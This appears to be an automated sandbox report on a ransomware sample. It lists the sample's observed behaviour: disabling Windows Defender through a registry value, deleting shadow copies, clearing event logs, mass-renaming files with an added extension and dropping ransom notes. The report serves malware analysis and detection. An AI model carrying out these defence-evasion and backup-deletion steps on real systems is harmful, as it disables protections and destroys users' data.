Analysis Overview
SHA256
ece6bccb64b3ea172b531008bdda7f24b0b28a193a67056a43689f852dfd9ddf
Threat Level: Known bad
The file 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Hive
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Runs net.exe
Suspicious use of WriteProcessMemory
Runs ping.exe
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 16:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 16:59
Reported
2022-01-12 16:59
Platform
win7-en-20211208
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 16:59
Reported
2022-01-12 17:04
Platform
win10-en-20211208
Max time kernel
163s
Max time network
125s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\SuspendGroup.raw => C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InitializeRename.crw => C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OptimizeRename.raw => C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff => C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SelectDebug.raw => C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DisableRepair.crw => C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SyncAssert.tif => C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompareUninstall.png => C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardMSDNR_Retail-pl.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_CtuFolQ6xGE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WXrcawFx_2Q0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WEhlYkzA8EM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_cardback.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-48_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dkFSCA3qJmc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WJ6r73KGnOM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VpNJHtFK5Qk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1250_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3009_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\resources.pri | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_M8AQ4flckP40.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\es-ES\ieinstal.exe.mui | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\FreeCell\Control_10.jpg | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\ContemporaryPhotoAlbum.potx.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_KZWkpXKGsNk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailBadge.scale-125.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_UX1uN7dth3Q0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_ykmScO5HkiE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_uTmkZukAU_Q0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Zha7z8wgPHI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_J_em_jQ1DPM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.dualsim2.surprise.small.scale-150.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_-GApP492Hv00.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipTsf.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_QW4M2iW4_Ds0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.News\Assets\news_button_down.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-256.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Dark.scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_lh994_VVNCk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VxylmRYVR3g0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GB.XSL.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_kfXk-VELlvg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FEsyvLrj3dk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_hxE_XqRD4HU0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Aquarium\mask\1h.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_yCiK8woPxW40.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSmallTile.contrast-black_scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-150.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dEDn0gCdCsI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sl_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_I1aRWYAqGdk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\settle.scale-140.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\time.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_zTnuhdtL9LE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\ado\msador28.tlb | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jZ0BdjJ05Eg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-20.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\WideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_MGg0nr6cMIs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
